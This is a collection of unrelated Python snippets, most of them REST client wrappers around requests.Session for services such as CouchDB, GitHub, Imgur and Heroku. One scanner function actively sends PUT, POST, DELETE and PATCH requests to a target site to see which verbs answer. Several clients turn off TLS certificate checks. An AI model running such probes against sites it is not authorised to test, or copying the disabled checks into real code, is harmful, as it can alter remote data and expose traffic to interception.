def delete_account( couchdb_session_admin: requests.Session, couchdb_baseurl: str, account: str, ) -> requests.Response: """ Use a session_admin to delete an account. If deletion succeeds, return a "shallow" 204 Response. If the account did not exist, return a "shallow" 404 Response. If an underlying request fails, return that Response. """ # Name of a corresponding user document and database. user_doc_id = "org.couchdb.user:{}".format(account) user_database = database_for_user(user=account) # Account at least partially existed if either the user or the database existed account_existed = False # Check if the user exists. response = couchdb_session_admin.get( urljoin(couchdb_baseurl, "_users/{}".format(user_doc_id)), ) if response.ok: # The account at least partially existed account_existed = True # The user exists, issue a delete including the "_rev" we obtained. existing_user_doc = response.json() response = couchdb_session_admin.delete( urljoin(couchdb_baseurl, "_users/{}".format(user_doc_id)), headers={"If-Match": existing_user_doc["_rev"]}, ) if not response.ok: # Deletion failed, return the underlying failure return response # Check if the database exists. response = couchdb_session_admin.get( urljoin(couchdb_baseurl, user_database), ) if response.ok: # The account at least partially existed account_existed = True # The database exists, issue a delete. response = couchdb_session_admin.delete( urljoin(couchdb_baseurl, user_database)) if not response.ok: # Deletion failed, return the underlying failure return response response = requests.Response() if account_existed: # Successful deletion response.status_code = 204 else: # No account existed response.status_code = 404 return response
def get_enabled_methods(self):
    """Probe the target site and return the HTTP verbs that answer 200.

    NOTE(review): each probe actually *sends* the verb — including PUT,
    POST, DELETE and PATCH — so this is an active, potentially
    state-changing check against the target.
    """
    session = Session()
    session.mount(self.sitio, HTTPAdapter(max_retries=2))
    request_headers = {'User-agent': self.user_agent}
    enabled = []
    # Same probe order as before: put, get, options, post, delete, head, patch.
    for verb in ('put', 'get', 'options', 'post', 'delete', 'head', 'patch'):
        probe = getattr(session, verb)
        if probe(self.sitio, headers=request_headers).status_code == 200:
            enabled.append(verb)
    return enabled
class JoolaBaseClient(object):
    """REST client for a single collection endpoint, using a caching HTTP
    adapter and either token or credential authentication.
    """

    def __init__(self, base_url, credentials=None, api_token=None, **kwargs):
        self.base_url = str(base_url)
        self.session = Session()
        for scheme in ('http://', 'https://'):
            self.session.mount(scheme, CachingHTTPAdapter())
        # Token auth wins over plain credentials when both are supplied.
        if api_token:
            self.session.auth = APITokenAuth(api_token)
        elif credentials:
            self.session.auth = credentials

    def list(self):
        """GET the whole collection."""
        return self.session.get(self.base_url)

    def get(self, lookup):
        """GET a single resource identified by `lookup`."""
        return self.session.get(self.base_url + str(lookup))

    def insert(self, **kwargs):
        """POST a new resource built from keyword arguments."""
        return self.session.post(self.base_url, data=kwargs)

    def patch(self, lookup, **kwargs):
        """PATCH fields of an existing resource."""
        return self.session.patch(self.base_url + str(lookup), data=kwargs)

    def delete(self, lookup):
        """DELETE a single resource identified by `lookup`."""
        return self.session.delete(self.base_url + str(lookup))
def _delete(session: requests.Session, consumer_id: str, resource: str,
            resource_id: str) -> None:
    """Delete one `resource` entry (e.g. a credential) from a consumer.

    NOTE(review): the URL is relative ("/consumers/..."); a vanilla
    requests.Session rejects relative URLs, so `session` is presumably a
    base-URL-aware session subclass — confirm against the caller.
    """
    logger.debug(
        f"Delete {resource} `{resource_id}` from consumer with id = `{consumer_id}` ... "
    )
    resp = session.delete(f"/consumers/{consumer_id}/{resource}/{resource_id}")
    # Delegate non-2xx handling to the shared response checker.
    _check_resp(resp)
def send(self, method, url, params=None, token=None):
    """Send one API request and return the Response (None on HTTPError).

    Fixes versus the previous version:
    - GET previously sent the JSON-*encoded string* as `params`; query
      parameters must be a mapping, so the raw dict is passed now.
    - the Session is closed even if the request raises (try/finally).
    - an unsupported method now raises ValueError instead of hitting an
      undefined local (`res`) and raising a confusing NameError.

    :param method: one of 'get', 'post', 'put', 'delete'
    :param url: path appended to ``self.API_ENDPOINT``
    :param params: request payload (query params for GET, JSON body otherwise)
    :param token: optional user token sent as X-USER-TOKEN
    """
    try:
        session = Session()
        session.headers = self.headers
        if token is not None:
            session.headers.update({'X-USER-TOKEN': token})
        endpoint = '{base_url}/{url}'.format(
            base_url=self.API_ENDPOINT,
            url=url,
        )
        data = json.dumps(params) if params else None
        try:
            if method == 'get':
                # Query params must be a mapping, not a JSON string.
                res = session.get(endpoint, params=params)
            elif method == 'post':
                res = session.post(endpoint, data=data)
            elif method == 'put':
                res = session.put(endpoint, data=data)
            elif method == 'delete':
                res = session.delete(endpoint)
            else:
                raise ValueError('Unsupported HTTP method: {}'.format(method))
            return res
        finally:
            # Always release the connection pool, even on errors.
            session.close()
    except HTTPError as e:
        self.logger.error(e)
class ImgurConnection(ImageHost):
    """Anonymous imgur uploader: uploads run on daemon threads and report
    back through the handler callbacks.
    """

    def __init__(self, handler):
        self.handler = handler
        self.session = Session()

    def connect(self):
        # imgur's REST API needs no persistent connection/login step.
        pass

    def uploadImage(self, imgname, imgbuffer, imgmime):
        """Upload asynchronously; on success hand the handler a delete job.

        Fixes versus the previous version:
        - the delete worker called onDeleteFailure() on the success path
          (it sat right after the raise/success check); failure is now
          reported only from the except path.
        - the local `json` variable shadowed the json module; renamed.
        """
        def doRequest():
            try:
                r = self.session.post(
                    'https://api.imgur.com/3/image',
                    timeout=20,
                    headers={'Authorization': 'Client-ID %s' % apikey},
                    data={
                        'title': 'Pyshot screenshot',
                        'name': imgname
                    },
                    files={'image': (imgname, imgbuffer, imgmime)})
                if r.status_code != 200:
                    raise Exception(r.json())
                payload = r.json()
                link = payload['data']['link']
                deleteHash = payload['data']['deletehash']

                def deleteJob():
                    def doDeleteRequest():
                        try:
                            r = self.session.delete(
                                'https://api.imgur.com/3/image/%s' % deleteHash,
                                timeout=20,
                                headers={
                                    'Authorization': 'Client-ID %s' % apikey
                                },
                            )
                            if r.status_code != 200:
                                raise Exception(r.json())
                            self.handler.onDeleteSuccess()
                        except Exception as e:
                            print(e)
                            # Report failure from the error path only.
                            self.handler.onDeleteFailure()

                    self.handler.onDeleteStart()
                    thread = threading.Thread(target=doDeleteRequest)
                    thread.daemon = True
                    thread.start()

                self.handler.onUploadSuccess(host_url=link, delete_job=deleteJob)
            except Exception as e:
                print('Upload error response:')
                print(e)
                self.handler.onUploadFailure()

        thread = threading.Thread(target=doRequest)
        thread.daemon = True
        thread.start()
def rename_default_branch(
    session: requests.Session,
    repo_name: str,
    current: str,
    target: str,
    delete_current: bool = False,
) -> None:
    """Rename a GitHub repo's default branch from `current` to `target`.

    Creates `target` at the same commit as `current`, flips the repo's
    default branch, and optionally deletes `current`. No-ops (with a log
    line) when `current` does not exist; tolerates `target` already
    existing as long as it points at the same SHA.
    """
    # First, look up the SHA for the current default branch
    r = session.get(GITHUB_API_URL + f"/repos/{repo_name}/git/refs/heads/{current}")
    if r.status_code == 404:
        logger.info(f"no branch named {current} on {repo_name}")
        return
    r.raise_for_status()
    sha = r.json()["object"]["sha"]

    # Try to create a new branch with the name given by target
    r = session.post(
        GITHUB_API_URL + f"/repos/{repo_name}/git/refs",
        json={
            "ref": f"refs/heads/{target}",
            "sha": sha
        },
    )
    if r.status_code == 422:
        logger.info(f"branch {target} already exists on {repo_name}")

        # The branch already exists: make sure it points at the same SHA,
        # otherwise bail out rather than flip the default to a divergent ref.
        r = session.get(GITHUB_API_URL + f"/repos/{repo_name}/git/refs/heads/{target}")
        r.raise_for_status()
        if r.json()["object"]["sha"] != sha:
            logger.warning(
                f"the SHA of branch {target} on {repo_name} does not match "
                f"{current}")
            return
    else:
        # This happens if the repo is read-only
        if r.status_code == 403:
            return
        r.raise_for_status()

    # Rename the default branch
    r = session.patch(
        GITHUB_API_URL + f"/repos/{repo_name}",
        json={
            "name": repo_name.split("/")[1],
            "default_branch": target
        },
    )
    r.raise_for_status()

    # Delete the existing branch if requested
    if delete_current:
        r = session.delete(GITHUB_API_URL +
                           f"/repos/{repo_name}/git/refs/heads/{current}")
        r.raise_for_status()
def deleteArtifact(config, appID, artiID):
    """Delete one artifact of a hawkBit software module.

    :param config: parsed config with a 'hawkbit' section (url/user/password)
    :param appID: software module id
    :param artiID: artifact id within the module

    Fix: on a failed request this used to call ``exit(0)``, signalling
    *success* to the calling shell; it now exits with status 1.
    """
    http = Session()
    http.auth = (config['hawkbit']['user'], config['hawkbit']['password'])
    app_response = http.delete(
        url='{}/rest/v1/softwaremodules/{}/artifacts/{}'.format(
            config['hawkbit']['url'], appID, artiID),
    )
    if __handle_error(app_response) != 0:
        # Non-zero exit so callers/scripts can detect the failure.
        exit(1)
class RestJsonClient(object):
    """JSON-over-HTTP client bound to a single host.

    Builds absolute URLs from relative URIs, validates status codes, and
    raises typed exceptions on failure.

    NOTE(review): every request is sent with verify=False (TLS certificate
    checks disabled) — confirm this is intentional for the target devices.
    """

    def __init__(self, hostname, use_https=True):
        super(RestJsonClient, self).__init__()
        self._hostname = hostname
        self._use_https = use_https
        self._session = Session()

    @property
    def session(self):
        # Expose the underlying requests.Session (e.g. for auth/header setup).
        return self._session

    def _build_url(self, uri):
        # Absolute URLs (already containing the hostname) pass through
        # untouched; otherwise prefix scheme + host and ensure a leading '/'.
        if self._hostname not in uri:
            if not uri.startswith('/'):
                uri = '/' + uri
            if self._use_https:
                url = 'https://{0}{1}'.format(self._hostname, uri)
            else:
                url = 'http://{0}{1}'.format(self._hostname, uri)
        else:
            url = uri
        return url

    def _valid(self, response):
        # 200/201/204 are success; 401 maps to the "unauthorized" exception,
        # everything else to the generic client exception.
        if response.status_code in [200, 201, 204]:
            return response
        elif response.status_code in [401]:
            raise RestClientUnauthorizedException(self.__class__.__name__,
                                                  'Incorrect login or password')
        else:
            raise RestClientException(self.__class__.__name__,
                                      'Request failed: {0}, {1}'.format(response.status_code,
                                                                        response.text))

    def request_put(self, uri, data):
        # NOTE: `data` is passed positionally, i.e. as a form/body payload
        # (not JSON) — unlike request_post below.
        response = self._session.put(self._build_url(uri), data, verify=False)
        return self._valid(response).json()

    def request_post(self, uri, data):
        response = self._session.post(self._build_url(uri), json=data, verify=False)
        return self._valid(response).json()

    def request_post_files(self, uri, data, files):
        response = self._session.post(self._build_url(uri), data=data, files=files, verify=False)
        return self._valid(response).json()

    def request_get(self, uri):
        response = self._session.get(self._build_url(uri), verify=False)
        return self._valid(response).json()

    def request_get_files(self, uri):
        # Returns the raw Response so the caller can stream/save the payload.
        response = self._session.get(self._build_url(uri), verify=False)
        return self._valid(response)

    def request_delete(self, uri):
        # Returns the raw response body bytes.
        response = self._session.delete(self._build_url(uri), verify=False)
        return self._valid(response).content
def delete(
    path: str,
    params: dict = None,
    session: Session = None,
    base_url: str = API_BASE_URL,
    **kwargs,
) -> Response:
    """DELETE `base_url + path`, defaulting to the shared API session.

    Extra keyword arguments are forwarded to ``Session.delete``.
    """
    active_session = session or _get_api_session()
    query = params if params else {}
    return active_session.delete(base_url + path, params=query, **kwargs)
def delete_user_rates(self, id_user_rates: int, token: str):
    """Remove an anime entry from the user's list on Shikimori.

    :param id_user_rates: ID of the user_rate entry on Shikimori
    :param token: user token
    :return: HTTP status code of the operation; 204 means success
    """
    session = Session()
    url = self.__BASE_URL_V2 + f'user_rates/{id_user_rates}'
    response = session.delete(url, headers=self.__get_headers(token=token))
    return response.status_code
def _send_request(
    sesh: requests.Session,
    method: str,
    url: str,
    params: Dict[str, Union[str, List[str]]],
    data: Any,
    verify: bool,
    timeout: int,
) -> requests.Response:
    """Dispatch a single HTTP request behind a spinner.

    GET sends only query params; POST/PUT/PATCH/DELETE additionally send
    `data` as a JSON body. Raises APIBuddyException for any other method.
    """
    with yaspin(spin):
        shared = {'params': params, 'timeout': timeout, 'verify': verify}
        if method == GET:
            return sesh.get(url, **shared)
        if method == POST:
            return sesh.post(url, json=data, **shared)
        if method == PUT:
            return sesh.put(url, json=data, **shared)
        if method == PATCH:
            return sesh.patch(url, json=data, **shared)
        if method == DELETE:
            return sesh.delete(url, json=data, **shared)
        raise APIBuddyException(
            title='Something went wrong',
            message='Try a different http method'
        )
class Flowdock:
    """Simple wrapper for Flowdock REST API."""

    API_URL = "https://api.flowdock.com"

    def __init__(self, api_key, debug=False, print_function=None):
        """Initialize Flowdock API wrapper.

        @param debug Print debug info if True
        @param print_function Use this function to print debug info. By
            default use python builtin print. Mainly for using click.echo
            without requiring click as dependency.
        """
        self.session = Session()
        # requests takes basic auth as a (user, pass) tuple; Flowdock wants
        # only the api key as the username, with no password.
        self.session.auth = (api_key, None)
        self.debug = debug
        self.print = print_function if print_function else print

    def get_organizations(self):
        """Get list of organizations this user has access to."""
        url = "{}/organizations".format(self.API_URL)
        if self.debug:
            self.print("Sending GET request to URL {}".format(url))
        response = self.session.get(url)
        response.raise_for_status()
        return response.json()

    def find_user_orgs(self, email):
        """Find organizations this user belongs to."""
        return [
            org for org in self.get_organizations()
            if Flowdock.user_in_org(email, org)
        ]

    @staticmethod
    def user_in_org(email, org):
        """Check whether `email` belongs to a member of `org`."""
        return any(member['email'] == email for member in org['users'])

    def delete_user_from_org(self, user, org):
        """Remove `user` from `org` via the REST API."""
        url = "{}/organizations/{}/users/{}".format(
            self.API_URL, org['parameterized_name'], user['id'])
        if self.debug:
            self.print("Sending DELETE request to url {}".format(url))
        response = self.session.delete(url)
        response.raise_for_status()

    def close(self):
        """Dispose of the underlying HTTP session."""
        self.session.close()
class HTTPStorage(Storage):
    """Storage backend that keeps files on a remote HTTP server, using
    GET/HEAD/PUT/DELETE against URLs under ``base_url``.
    """

    def __init__(self, base_url=None):
        self._base_url = base_url
        # Fix: `if not self._session:` read an attribute that was never
        # initialized, raising AttributeError on construction unless a base
        # class happened to define it. getattr() makes the lazy-init safe
        # either way.
        if not getattr(self, '_session', None):
            self._session = Session()

    def _value_or_setting(self, value, setting):
        # Fall back to the Django setting when no explicit value was given.
        return setting if value is None else value

    @cached_property
    def base_url(self):
        # Normalize to a trailing slash so urljoin keeps the full prefix.
        if self._base_url is not None and not self._base_url.endswith('/'):
            self._base_url += '/'
        return self._value_or_setting(self._base_url, settings.MEDIA_URL)

    def _url(self, name):
        # Resolve `name` under base_url and refuse anything that escapes it.
        url = urljoin(self.base_url, name.lstrip("/"))
        assert (url.startswith(self.base_url))
        return url

    def url(self, name):
        return self._url(name)

    def delete(self, name):
        self._session.delete(self._url(name))

    def exists(self, name):
        # HEAD probe: 2xx -> exists, 404 -> missing, anything else raises.
        r = self._session.head(self._url(name))
        if r.status_code >= 200 and r.status_code < 300:
            return True
        if r.status_code == 404:
            return False
        r.raise_for_status()

    def _save(self, name, content):
        self._session.put(self._url(name), data=content)
        return name

    def _open(self, name, mode='rb'):
        # Fix: `self` was missing from the signature, so any call through
        # the storage API raised TypeError instead of NotImplementedError.
        raise NotImplementedError()  # TODO
def delete(resource: str, session: requests.Session, id_: str) -> None:
    """Delete one object of the given admin-API resource type by id."""
    valid_resources = (
        "consumers",
        "services",
        "routes",
        "plugins",
        "key-auths",
        "basic-auths",
    )
    # Guard against typos in the resource name before touching the API.
    assert resource in valid_resources
    logger.debug(f"Delete `{resource}` with id = `{id_}` ... ")
    _check_resp(session.delete(f"/{resource}/{id_}"))
class HTTPClient(abstract_http_client.AbstractHTTPClient):
    """HTTP transport for the PAYMILL API (basic auth: key as username)."""

    def __init__(self, base_url, user_name, user_pass='', http_debug_enabled=False):
        """Initialize a new paymill interface connection. Requires a private key."""
        self.base_url = base_url
        self.session = Session()
        # PAYMILL authenticates with the private key as username and an
        # empty password.
        self.session.auth = (user_name, "")
        # NOTE(review): TLS verification disabled — confirm this is intended.
        self.session.verify = False
        self.operations = dict(GET=self.get, POST=self.post, PUT=self.put, DELETE=self.delete)
        #for internal usage
        self.response = None
        http_debug(enabled=http_debug_enabled)

    def __call__(self, request_type, params, url, return_type):
        # Dispatch on request_type; a ValueError from .json() means the API
        # replied with a non-JSON error body.
        try:
            return self.operations[request_type](params, url, return_type)
        except ValueError as v:  # JSON encoding failed
            #=>PAYMILL API sent us an error, without JSON data
            if self.response is not None:
                raise PMError(self.response.content, self.response.status_code)
            else:
                raise PMError()

    def put(self, params, url, return_type):
        # `params` is sent positionally as the request body (form data).
        return self._check_reponse(self.session.put(self.base_url + url, params,
                                                    hooks=dict(response=self._request_callback)).json(),
                                   return_type)

    def post(self, params, url, return_type):
        json = self.session.post(self.base_url + url, params,
                                 hooks=dict(response=self._request_callback)).json()
        return self._check_reponse(json, return_type)

    def delete(self, params, url, return_type):
        return self._check_reponse(self.session.delete(self.base_url + url, params=params,
                                                       hooks=dict(response=self._request_callback)).json(),
                                   return_type)

    def get(self, params, url, return_type):
        return self._check_reponse(self.session.get(self.base_url + url, params=params,
                                                    hooks=dict(response=self._request_callback)).json(),
                                   return_type)

    def _request_callback(self, r, *args, **kwargs):
        # Response hook: remember the last raw Response for error reporting.
        self.response = r

    def _check_reponse(self, json_data, return_type):
        # (sic: "reponse" — name kept as-is; other code may reference it.)
        # Wrap the payload in `return_type`, or raise PMError on API errors.
        if 'data' in json_data:
            #success
            if isinstance(json_data['data'], dict):
                return return_type(json_data['data'])
            else:
                return return_type(json_data)
        else:
            #error
            raise PMError(json_data, self.response.status_code)
def deleteTask(taskId):
    """Delete a single Habitica task by id.

    Network-level errors are printed and swallowed; the parsed response
    body is currently unused (debug output was removed).
    """
    endpoint = f'https://habitica.com/api/v3/tasks/{taskId}'
    session = Session()
    try:
        reply = session.delete(endpoint, headers=apiHeader)
        data = json.loads(reply.text)
    except (ConnectionError, Timeout, TooManyRedirects) as error:
        print(error)
class REST(metaclass=Singleton):
    """Singleton REST helper that keeps one authenticated session and the
    most recent response (code/text) as instance state.

    Fix: the Python-2 style ``__metaclass__ = Singleton`` class attribute
    is silently ignored on Python 3 (this file uses f-strings elsewhere,
    i.e. Python 3.6+), so the singleton behavior never applied; it is now
    declared with the ``metaclass=`` keyword. Confirm the runtime really
    is Python 3 before shipping.
    """

    def __init__(self, user='', password='',
                 content_type=r'application/yang.data+json'):
        self._session = None
        self._response = None
        self.response_code = None
        self.response_as_json = None
        self.response_as_text = None
        self._create_session(user=user, password=password,
                             content_type=content_type)

    def _create_session(self, user, password, content_type):
        # Basic-auth session with a fixed Content-Type for all requests.
        self._session = Session()
        self._session.auth = (user, password)
        self._session.headers["Content-Type"] = content_type

    def send_get_request(self, url):
        self._response = self._session.get(url)
        self.response_code = self._response.status_code
        self.response_as_text = self._response.text

    def send_post_request(self, url, data):
        self._response = self._session.post(url=url, data=data)
        self.response_code = self._response.status_code
        self.response_as_text = self._response.text

    def send_put_request(self, url, data):
        self._response = self._session.put(url=url, data=data)
        self.response_code = self._response.status_code
        self.response_as_text = self._response.text

    def send_delete_request(self, url):
        self._response = self._session.delete(url=url)
        self.response_code = self._response.status_code
        self.response_as_text = self._response.text

    @property
    def session(self):
        return self._session
class HttpClient:
    """Convenience facade over a single requests.Session: verb helpers plus
    accessors for headers, cookies, auth and proxies.
    """

    def __init__(self):
        self.__session = Session()

    def get(self, url, **kwargs):
        return self.__session.get(url, **kwargs)

    def post(self, url, data, json=None, **kwargs):
        return self.__session.post(url, data, json=json, **kwargs)

    def delete(self, url, **kwargs):
        return self.__session.delete(url, **kwargs)

    def put(self, url, data, **kwargs):
        return self.__session.put(url, data, **kwargs)

    def get_headers(self):
        return self.__session.headers

    def set_headers(self, k, v):
        self.__session.headers[k] = v

    def get_cookies(self):
        return self.__session.cookies

    def set_cookies(self, cookies):
        # Accepts a RequestsCookieJar (or dict) and merges it into the
        # session jar, e.g.:
        #   jar = RequestsCookieJar()
        #   jar.set("BAIDUID", "...", domain="baidu.com")
        self.__session.cookies = merge_cookies(self.__session.cookies, cookies)

    def get_auth(self):
        return self.__session.auth

    def set_auth(self, auth):
        # e.g. auth = HTTPBasicAuth('user', 'pass')
        self.__session.auth = auth

    def set_proxy(self, proxies):
        # e.g. {'http': 'http://localhost:8888', 'https': 'http://localhost:8888'}
        self.__session.proxies = proxies

    def get_proxy(self):
        return self.__session.proxies

    def close(self):
        self.__session.close()
class CRequests:
    """requests.Session wrapper that applies a default (connect, read)
    timeout to every call and pools connections for http/https.
    """

    def __init__(self, CONNECT_TIMEOUT=CONNECT_TIMEOUT, READ_TIMEOUT=READ_TIMEOUT, stream=False):
        # Defaults come from the module-level constants of the same name.
        self.requests = Session()
        self.requests.stream = stream
        # Ignore environment proxy/CA settings (HTTP_PROXY, REQUESTS_CA_BUNDLE, ...).
        self.requests.trust_env = False
        self.requests.mount('http://', adapters.HTTPAdapter(pool_connections=NUM_POOLS,
                                                            pool_maxsize=POOL_MAXSIZE))
        self.requests.mount('https://', adapters.HTTPAdapter(pool_connections=NUM_POOLS,
                                                             pool_maxsize=POOL_MAXSIZE))
        # Default timeout tuple: (connect timeout, read timeout).
        self.tuple = (CONNECT_TIMEOUT, READ_TIMEOUT)

    def request(self, method, url, **kwargs):
        kwargs.setdefault('timeout', self.tuple)
        return self.requests.request(method, url, **kwargs)

    def get(self, url, **kwargs):
        kwargs.setdefault('timeout', self.tuple)
        return self.requests.get(url, **kwargs)

    def options(self, url, **kwargs):
        kwargs.setdefault('timeout', self.tuple)
        return self.requests.options(url, **kwargs)

    def head(self, url, **kwargs):
        kwargs.setdefault('timeout', self.tuple)
        return self.requests.head(url, **kwargs)

    def post(self, url, data=None, json=None, **kwargs):
        kwargs.setdefault('timeout', self.tuple)
        return self.requests.post(url, data=data, json=json, **kwargs)

    def put(self, url, data=None, **kwargs):
        kwargs.setdefault('timeout', self.tuple)
        return self.requests.put(url, data=data, **kwargs)

    def patch(self, url, data=None, **kwargs):
        kwargs.setdefault('timeout', self.tuple)
        return self.requests.patch(url, data=data, **kwargs)

    def delete(self, url, **kwargs):
        kwargs.setdefault('timeout', self.tuple)
        return self.requests.delete(url, **kwargs)

    def close(self):
        self.requests.close()
class GistClient(BaseClient):
    """Client for the GitHub Gists REST API (v3), token-authenticated."""

    session: Session
    base_url: str

    def __init__(self):
        self.session = Session()
        self.session.headers["accept"] = "application/vnd.github.v3+json"
        self.session.headers["Authorization"] = f"token {config.GITHUB_TOKEN}"
        self.base_url = config.API_URL

    def get_all_gists_for_user(self, username: str):
        """List every gist owned by `username`."""
        response = self.session.get(f"{self.base_url}/users/{username}/gists")
        return self.get_response(response, 200)

    def get_gist_with_id(self, gist_id: str):
        """Fetch one gist by id."""
        response = self.session.get(f"{self.base_url}/gists/{gist_id}")
        return self.get_response(response, 200)

    def create_gist(self, description: str, files: Dict):
        """Create a private gist; the API answers 201 on success."""
        payload: Dict = {
            "description": description,
            "files": files,
            "public": False
        }
        response = self.session.post(f"{self.base_url}/gists", json=payload)
        return self.get_response(response, 201)

    def update_gist(self, gist_id: str, description: str, files: Dict):
        """PATCH the description/files of an existing gist."""
        payload: Dict = {
            "description": description,
            "files": files,
            "public": False
        }
        response = self.session.patch(f"{self.base_url}/gists/{gist_id}",
                                      json=payload)
        return self.get_response(response, 200)

    def delete_gist(self, gist_id: str):
        """Delete a gist; the API answers 204 on success."""
        response = self.session.delete(f"{self.base_url}/gists/{gist_id}")
        return self.get_response(response, 204)
class RRemote:
    """Robot Framework remote-library client over a simple HTTP protocol.

    On construction it asks the server for a per-suite instance id and
    sends it back on every request via the `x-instance-id` header.
    """

    ROBOT_LIBRARY_SCOPE = "SUITE"

    def __init__(self, url):
        self.s = Session()
        self.url = url
        response = self.s.get(f"{self.url}/create_instance")
        # NOTE(review): this *replaces* the session's default headers
        # wholesale rather than updating them — confirm that is intended.
        self.s.headers = {"x-instance-id": response.headers["x-instance-id"]}

    def get_keyword_names(self):
        response = self.s.get(f"{self.url}/get_keyword_names")
        return response.json()

    def run_keyword(self, name, args, kwargs):
        # Serialize the keyword call with `dumps`; the octet-stream content
        # type presumably matches the server's expectation — confirm.
        response = self.s.post(
            f"{self.url}/run_keyword",
            data=dumps({
                "name": name,
                "args": args,
                "kwargs": kwargs
            }),
            headers={"Content-Type": "application/octet-stream"},
        )
        result = RemoteResult(**loads(response.content))
        # Forward the remote keyword's captured output to our stdout.
        sys.stdout.write(result.output)
        if result.status != "PASS":
            raise RemoteError(result.error, result.traceback, result.fatal,
                              result.continuable)
        return result.return_

    def get_keyword_arguments(self, name):
        response = self.s.get(f"{self.url}/get_keyword_arguments/?name={name}")
        return response.json()

    def get_keyword_documentation(self, name):
        response = self.s.get(
            f"{self.url}/get_keyword_documentation/?name={name}")
        return response.text

    def __del__(self):
        # Best-effort server-side cleanup when the library is collected.
        response = self.s.delete(f"{self.url}/delete_instance")
class SyncRequests:
    """Blocking HTTP helper wrapping requests.Session; every call adapts
    the raw result into the project's Response type.
    """

    def __init__(self, **kwargs):
        """
        To set the proxy:
            if proxy:  # conditionally detect proxy setting
                if proxy.startswith("https://"):
                    self.session.proxies = {"https": proxy[8:]}
                elif proxy.startswith("http://"):
                    self.session.proxies = {"http": proxy[7:]}
                else:
                    self.session.proxies = {"http": proxy}

        :param max_workers:
        :param proxy: only one proxy is supported with urllib3.
        """
        from requests import Session
        # NOTE(review): requests.Session() takes no constructor arguments,
        # so any kwargs passed here raise TypeError — confirm whether a
        # custom Session subclass was intended.
        self.session = Session(**kwargs)

    def get(self, *args, **kwargs):
        _ = self.session.get(*args, **kwargs)
        return Response(_)

    def put(self, *args, **kwargs):
        _ = self.session.put(*args, **kwargs)
        return Response(_)

    def post(self, *args, **kwargs):
        _ = self.session.post(*args, **kwargs)
        return Response(_)

    def delete(self, *args, **kwargs):
        _ = self.session.delete(*args, **kwargs)
        return Response(_)

    def fetch(self, *args, **kwargs):
        # NOTE(review): requests.Session defines no `fetch` method, so this
        # raises AttributeError when called — confirm the intended target.
        _ = self.session.fetch(*args, **kwargs)
        return Response(_)
def delete(url: str, params: dict = None, headers: dict = None,
           data: dict = None, timeout: int = 2, log: str = None,
           session: requests.Session = None,
           **kwargs) -> Union[requests.Response, None]:
    """Issue a DELETE with an optional JSON body; returns None on timeout.

    :param params: appended to the URL as a query string
    :param data: serialized as the JSON request body
    :param log: log level name; when set, request and response are logged
    :param session: optional Session to reuse; falls back to requests.delete

    Fix: extra **kwargs were accepted but silently dropped; they are now
    forwarded to the underlying requests call.
    """
    if params:
        # NOTE(review): assumes `url` carries no query string yet — confirm.
        url += f"?{urlencode(params)}"
    try:
        # json= (not data=) so a single-quoted dict is sent as proper
        # double-quoted JSON.
        if session:
            res = session.delete(url=url, json=data, headers=headers,
                                 timeout=timeout, **kwargs)
        else:
            res = requests.delete(url=url, json=data, headers=headers,
                                  timeout=timeout, **kwargs)
        if log:
            logs.log(message=f"DELETE {url}, Body: {data}", level=log)
            # A 4xx/5xx Response is falsy, so failures log at "error".
            logs.log(message=f"Response: {res}",
                     level=("error" if not res else log))
        return res
    except requests.exceptions.Timeout:
        return None
class Heroku:
    """Minimal Heroku Platform API wrapper: restart dynos, fetch logs."""

    def __init__(self, api_key):
        self.session = Session()
        self.api_key = api_key

    def _api_headers(self):
        # Every Platform API call needs the v3 accept header + bearer token.
        return {'Content-Type': 'application/json',
                'Accept': 'application/vnd.heroku+json; version=3',
                'Authorization': f'Bearer {self.api_key}'}

    def reload_app(self, app_name):
        """Restart all dynos of `app_name` (DELETE /apps/{app}/dynos)."""
        return self.session.delete(
            f'https://api.heroku.com/apps/{app_name}/dynos',
            headers=self._api_headers())

    def get_logs(self, app_name, lines=100000):
        """Open a log session and return its text; on HTTP >= 400 return
        the failed Response object instead."""
        created = self.session.post(
            f'https://api.heroku.com/apps/{app_name}/log-sessions',
            data=json.dumps({'lines': lines}),
            headers=self._api_headers())
        if created.status_code >= 400:
            return created
        log_stream = self.session.get(created.json()['logplex_url'])
        return log_stream.text
class APISession(object):
    """Basic-auth API session with retrying adapters for http and https.

    NOTE(review): `verify_ssl` defaults to False (TLS checks disabled) —
    confirm this is intentional for the target environment.
    """

    def __init__(self, username, password, host, max_retries=3):
        self.__host = host
        self.__session = Session()
        self.__session.auth = (username, password)
        self.__session.headers.update(HEADERS)
        self.__session.mount('http://', HTTPAdapter(max_retries=max_retries))
        self.__session.mount('https://', HTTPAdapter(max_retries=max_retries))
        self.verify_ssl = False

    def post(self, uri, data, headers=None):
        """POST `data` to host+uri.

        Fix: the previous `headers={}` mutable default argument is replaced
        with None (shared-dict anti-pattern); behavior is unchanged since
        the dict was never mutated.
        """
        url = self.__host + uri
        logger.debug("{}-{}".format(url, data))
        resp = self.__session.post(url, data=data, headers=headers or {},
                                   verify=self.verify_ssl)
        return resp

    def get(self, uri, data):
        # NOTE(review): sends `data` as a GET request *body*, which many
        # servers ignore — kept as-is for compatibility with callers.
        url = self.__host + uri
        logger.debug("{}-{}".format(url, data))
        resp = self.__session.get(url, data=data, verify=self.verify_ssl)
        return resp

    def put(self, uri, data):
        url = self.__host + uri
        logger.debug("{}-{}".format(url, data))
        resp = self.__session.put(url, data=data, verify=self.verify_ssl)
        return resp

    def delete(self, uri, data):
        url = self.__host + uri
        logger.debug("{}-{}".format(url, data))
        resp = self.__session.delete(url, data=data, verify=self.verify_ssl)
        return resp
class Connection:
    """Pooled HTTP connection to an API server, with optional retries."""

    def __init__(
        self,
        host,
        port,
        auth_type=REQUEST.AUTH_TYPE.BASIC,
        scheme=REQUEST.SCHEME.HTTPS,
        auth=None,
        pool_maxsize=20,
        pool_connections=20,
        pool_block=True,
        base_url="",
        response_processor=None,
        session_headers=None,
        retries_enabled=True,
        **kwargs,
    ):
        """Generic client to connect to server.

        Args:
            host (str): Hostname/IP address
            port (int): Port to connect to
            pool_maxsize (int): The maximum number of connections in the pool
            pool_connections (int): The number of urllib3 connection pools to cache
            pool_block (bool): Whether the connection pool should block for connections
            base_url (str): Base URL
            scheme (str): http scheme (http or https)
            response_processor (dict): response processor dict
            session_headers (dict): session headers dict
            auth_type (str): auth type that needs to be used by the client
            auth (tuple): authentication
            retries_enabled (bool): Flag to perform retries (default: false)
        """
        self.base_url = base_url
        self.host = host
        self.port = port
        self.session_headers = session_headers or {}
        self._pool_maxsize = pool_maxsize
        self._pool_connections = pool_connections
        self._pool_block = pool_block
        self.session = None
        self.auth = auth
